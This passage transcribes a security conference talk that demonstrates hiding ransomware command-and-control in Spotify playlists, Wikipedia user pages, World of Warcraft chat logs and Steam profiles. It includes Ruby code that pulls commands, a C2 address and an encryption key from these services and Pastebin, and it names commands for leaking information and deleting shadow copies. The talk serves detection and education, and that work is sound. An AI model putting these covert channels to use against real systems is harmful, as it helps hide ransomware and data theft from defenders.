leave this note. Two Shadows is another command that has been added, which will try to delete shadow copies; Asleep will wait, and Adios will obviously send the sequence end. Now, what happens if I remove Two Shadows, Asleep, and I Started Something I Couldn't Finish from the playlist? This is to show that this happens in real time; the client will read the commands in real time. As you can see, now there are no interrupted jobs, nobody is waiting for anything, and we don't have the shadow copy delete command anymore, since Two Shadows is gone. Now, oh no, we have this strange file here and somebody is asking for capybara coins. Oh man, okay.
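Before the summary of this client, here is a rough sketch of the lookups it performs, reading the playlist's title, description and track names through the Spotify Web API; the playlist ID, the pre-obtained OAuth token and the song-to-command mapping are illustrative assumptions, not the exact sample:

```ruby
# Read a playlist's title, description and track names via the Spotify Web API.
require 'net/http'
require 'json'

TOKEN       = ENV.fetch('SPOTIFY_TOKEN')   # token from the client-credentials flow
PLAYLIST_ID = '37i9dQZFxxxxxxxxxxxxxx'     # placeholder playlist ID

def spotify_get(path)
  uri = URI("https://api.spotify.com/v1#{path}")
  req = Net::HTTP::Get.new(uri)
  req['Authorization'] = "Bearer #{TOKEN}"
  res = Net::HTTP.start(uri.host, uri.port, use_ssl: true) { |http| http.request(req) }
  JSON.parse(res.body)
end

playlist = spotify_get("/playlists/#{PLAYLIST_ID}")
# The title carries the wake word, the dash-separated C2 IP and part of the key;
# the description carries the rest of the key because of the title length limit.
puts "title: #{playlist['name']}"
puts "description: #{playlist['description']}"

COMMANDS = {
  'So Alive' => 'sequence start', 'Fix' => 'fix key',
  'Tank!'    => 'start encryption', 'Adios' => 'sequence end'
}

playlist['tracks']['items'].each do |item|
  song = item['track']['name']
  puts "#{song} -> #{COMMANDS.fetch(song, 'no-op')}"
end
```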
I think it's time to move on to another client. So, this is the final summary: as you can see, different songs mean different commands, so it's worth giving it a try. Now let's move on to the next one, the Wikipedia client. You can use MediaWiki's free API to query any article on Wikipedia or, being real here, any other MediaWiki instance. After you register your user, it is possible to edit its profile page and add almost anything that you can imagine. Once generated, this is a special entry which is considered to be an article and can be queried via the API; it will have the form of User: plus your username. As we don't want to disturb a project like Wikipedia, we have only edited my own profile, and we have only done one API query to read it once, so there won't be a live demonstration of this client. We also discourage anyone from using Wikipedia itself for testing. As you can see, that's my own page: you have sequence start, let me tell you a secret, whatsup, do it, and sequence end. Then we have a special client which connects to the MediaWiki API and fetches a specific tainted user, which in this case is mine. It will try to recover the commands from the page and parse them: we have sequence start, we have received the key, there is some information to leak from our side, start an encryption cycle, and receive a sequence end. That's it. Again, this page has been reverted, as it's my own profile on Wikipedia. If you want to test this, we encourage you to run your own MediaWiki server; it's quite easy to do via Docker or a virtual instance or whatever you want, and it's worth giving it a try on a private instance. So, the next one: here is when we start doing some way crazier things. We said, why not try World of Warcraft or any other role-playing game? And we said okay, why not give it a try. We are using TrinityCore, which is an awesome project, a private World of Warcraft server emulator which you can use to easily create your own C2 instance. Now you might say, wait, how are you going to use this game maliciously? And as you can see in the picture on the right, it's something that you can ask, but you know the answer: we have done it. After creating a character, the player can build custom macros and also run minified Lua scripts. But bear in mind that the sandboxed Lua version of World of Warcraft does not provide access to core runtime functions like operating system operations or networking operations, so you will be more or less caged inside the game. Still, this is something that we can use in our favor. As you can see, these macros and scripts can run almost anything that you can do with your keyboard and mouse. I can't say for sure whether it can run everything, but so far it was able to do everything we needed, so we could easily automate the flow of our C2 routine in a very friendly and easy way. We have created the Capybara macro that you can see on the right, with that cute paw, but it will only click certain buttons; we can make it click on an action bar, an action button. But this is the question: what do we want to do with those buttons?
So we started figuring out how we could build short functions, because as you can see in the lower part of the screenshot to the right, we have used 126 characters out of 255, which is pretty short, pretty short to build something in a comfortable way. So we had to rely on a lot of creativity here in order to do minimalistic things which would be tied together. After a little research and a lot of tampering, we were able to create our level 14 hacker, which is ready to claim back Warsong Gulch or take part in a raid. As you can see, this is the hacker's tool bar, the hacker's skills. Now you might say, okay, but how are you going to distribute these commands, these skills? Luckily, and this is some old information but we discovered it just a few days ago, TrinityCore provides a way of logging all of the chat inside the server, all the chat that goes on during each server session. So using the chat function seemed like a nice idea and the right way to do things. Now we said, okay, we have the chats, we have them recorded in a file, but now we need to distribute them, we need to filter them. We don't want any player saying okay, send this command there, send this command here. So we needed a way to filter all of this and publish all of this. As you can see in this screenshot, we were able to pipe our chats to a file, and we were tailing that file in Unix. So far so good, but this isn't going anywhere yet. So we have the chat, I was able to parse it, I was able to filter it only by Drake, my player, which is in no way a reference to Francis Drake the pirate. And we said okay, now we have to pipe that very same log file somewhere; we have to publish it over the network. So the next point is to distribute the chat messages with Sinatra. That's it, 8 lines of code, and we could do it in way less I think, but we wanted to keep the code as friendly as possible. We are only going to read the last 10 entries from the chat log every time somebody requests that endpoint. I know this is not the best way to do things, we could also stream the file, but this will do for now.
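That Sinatra snippet is small enough to sketch here. This is an illustrative version, not the exact code from the slide: it reads the TrinityCore chat log, keeps only my character's lines, and serves the last ten entries; the log path and character name are assumptions:

```ruby
# Serve the last 10 chat-log lines for one character over HTTP (illustrative sketch).
require 'sinatra'

CHAT_LOG  = '/opt/trinitycore/logs/Chat.log'   # assumed TrinityCore chat log path
CHARACTER = 'Drake'                            # the player whose messages carry the commands

get '/chat' do
  return 'no chat log yet' unless File.exist?(CHAT_LOG)

  File.readlines(CHAT_LOG)
      .select { |line| line.include?(CHARACTER) }  # keep only Drake's messages
      .last(10)                                    # last 10 entries, as described
      .join
end
```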
So now let's start the demo, and let's take part in a raid. This will be a little bit longer than the other videos. Give me a second... okay. Now let me pause here: we are somewhere around Westfall. We have three terminals here: the first one is the C2, which I made a little bit smaller because this is a really crowded window; we have the chat log monitor here, which will be tailing the chat log file; and obviously the eternal victim, this poor Docker container which will receive all the hits again. We have our macros here and our action bar, so let's roll. Okay, we'll start by turning on the Capybara server; okay, awaiting connections. Now we are going to tail the file constantly, so everything will be streamed here. Okay, these are the entries that I sent to the file before. The victim will wait for a couple of seconds now. This is the Capybara ransomware macro, which will click sequentially on all of these little macros or Lua scripts that are laying around here: we have encrypt, get key, leak info, reroll key, reroll server if available, sequence end, sequence start and set key. Now this will happen really quick; take a look at the chat window. Once I click here, the window will be flooded automatically. Okay, now this is already piped there; the client will look only for things that Drake said. Now the client will connect to the server, and the server will stream the file, or actually take a couple of lines. And boom, this already happened as we were talking: the Docker container connected. The host won't really be encrypted, that's something we clarified before, it's just a dummy function, and "your files are encrypted", the ransom note, is once again present. I think we should consider a cyber insurance company right now. Okay, that's enough. And wait, I shouldn't go so fast. Yeah, that should do. So, let's move on. The Steam client: this is by far the trickiest one. We weren't really able to do a lot of things with Steam's API, which turned out to be really restrictive, almost to the point of thinking that we should leave it behind and use another thing. But luckily we found a workaround: we decided on using the player profile page as a starting point, because the API wasn't getting us anywhere. Once we jumped into using this profile page, we found that we don't have a lot of fields, a lot of space, to store things like a key or a C2 address, so we started once again thinking about a possible workaround, and we found that the optional field, real name, could be handy in this case. As you can see here, this is quite a strange real name; I can tell you for sure that in Argentina we don't use such complicated names, so you are okay if you think that this is something fishy. As I said, pretty strange name, right? The content of this field actually represents two different pastes on Pastebin: the first contains the C2 address and the second one contains the key. Now, by reading the player profile via the API we have the information we need to start, but how do we issue commands? We are out of space, we don't have a lot of things to modify here, and issuing commands here would be pretty hard to implement. So we decided to support two different modes in this client: games and friends. By using the games mode, the C2 administrator can map the list of games owned by the account, the profile we are using, to a list of C2 commands. Each game can represent a command and can be listed and delisted from the profile at will, but this is not an easy process, let me tell you. By using the friends mode, the C2 administrator can map the list of friends to a list of commands, so each friend becomes a possible C2 command. Again, friends can be removed and added at will. But again, we discourage the use of this one specifically, since both modes are not easily maintained, and Steam seems pretty strict with bans, at least with us. So creating multiple accounts or using this for experimenting can turn your account into something unusable. So take care of...
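Here is a rough sketch of the two lookups that approach relies on: reading the profile's real name field (which hides the two Pastebin IDs) and pulling the friends list through the Steam Web API. The API key, SteamID and the assumption that the real name is just two space-separated paste IDs are placeholders for illustration:

```ruby
# Read a Steam profile's "real name" and friends list via the Steam Web API,
# then resolve the two Pastebin pastes referenced there (illustrative sketch).
require 'net/http'
require 'json'

KEY      = ENV.fetch('STEAM_API_KEY')
STEAM_ID = '76561198000000000'          # placeholder 64-bit SteamID

def api_get(url, params)
  uri = URI(url)
  uri.query = URI.encode_www_form(params)
  JSON.parse(Net::HTTP.get(uri))
end

summary   = api_get('https://api.steampowered.com/ISteamUser/GetPlayerSummaries/v0002/',
                    key: KEY, steamids: STEAM_ID)
real_name = summary['response']['players'].first['realname']

# Assume the "real name" holds two Pastebin IDs: one with the C2 IP, one with the key
c2_paste, key_paste = real_name.split
c2_ip = Net::HTTP.get(URI("https://pastebin.com/raw/#{c2_paste}")).strip
key   = Net::HTTP.get(URI("https://pastebin.com/raw/#{key_paste}")).strip

friends = api_get('https://api.steampowered.com/ISteamUser/GetFriendList/v0001/',
                  key: KEY, steamid: STEAM_ID, relationship: 'friend')
puts "C2: #{c2_ip}, key length: #{key.length}, " \
     "friends available as commands: #{friends['friendslist']['friends'].size}"
```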
As you can see, we have here a list of my friends, which is not a lot, actually. So I map each one of them, and you can see this in line 41, which is commented: each one is mapped to a command. We start reading things, and you can see that it says, okay, I found a Pastebin ID; I'm searching for the encryption key there, and I found it. Now it has found another Pastebin ID; I'm searching for the C2 IP there, and I found it. And then it tries to start the routine. Let's see how the games mode works. Warhammer seems to be the sequence start, LEGO is set key, Kingdom Rush is leak info, Darkest Dungeon is encrypt start, and another Warhammer is the sequence end. This will be exactly the same behavior: it will start to look for the IP address and the encryption key on Pastebin, but it will use the games as the list of commands. Now, the problem is that certain games are paid, so it now supports free games too. But again, Steam's API is a little bit restrictive, so you have to explicitly ask for free games to be listed. So, as you may see, this is the wackiest one so far. Let's see a demo of it. Give me a second, once again. Okay, this is my profile, and the Pastebins: as you can see, one contains the key, the other one contains a plain IP address, and they are listed as my real name. You can judge me by the games I play, please. Now we're going to start using the friends mode. We start reading the commands. Again, this is one Pastebin, this is the other Pastebin. And it has already placed the ransom note; let me check. Yeah, it did. Oh man, not these guys again. So, this was the last client we have to show today, and sadly it's time to go. We are really happy to be here today at the Adversary Village; we have really enjoyed doing this talk, creating it and researching these crazy topics, and we really hope that you have enjoyed it too. So let's jump to the conclusions and the Q&A. Our conclusions are simple: these examples do not pose a real-world danger, but they could easily be adapted to do so with a little bit of tweaking. When talking about traffic, never assume: what might seem to be normal traffic to encyclopedias or streaming services could be hiding something else, sometimes in plain sight, sometimes in a more complex, more cryptic way, like the Spotify client I showed you. And if you want to build a nice hacker in World of Warcraft, use Rogue plus Engineering, which are pretty nice choices. If you are brave enough, anything can be a C2. Don't be afraid to reach out on Twitter or on GitHub; we are always working on crazy things, mostly on hardware hacking projects, but sometimes we jump to software like we did today. So get in touch, don't be afraid to approach us. We are going to publish this on GitHub, so feel free to clone it; the only thing you need to do yourself is get your own API keys, because we are obviously not going to upload ours. So, we really hope you enjoyed this, and we want to thank all the Adversary Village team for inviting us today. If you have any questions, we are happy to discuss them on the Discord server. Thank you!
It is truly amazing how many and diverse methods an attacker has to "call home", exfiltrate information, or coordinate the next steps in his chain of attack. In this talk we will demonstrate (and automate) the most wacky, unexpected, and interesting methods for setting up a C2 server: Messaging apps? Social media profiles? Video games or gaming platforms? Yes, and there's more. The more sacred and innocent an app appears to be, the higher the score for us when weaponizing it. We will explain from scratch the function, the construction and even the automation with Ruby and Python of C2 servers based on a wide range of applications of common and daily use. For this we will use a fake toy ransomware, which will try to call home, exfiltrate information and coordinate an attack in the most crazy, bizarre and above all... unexpected ways. Lots of short demos make this talk suitable to both newcomers and experienced people.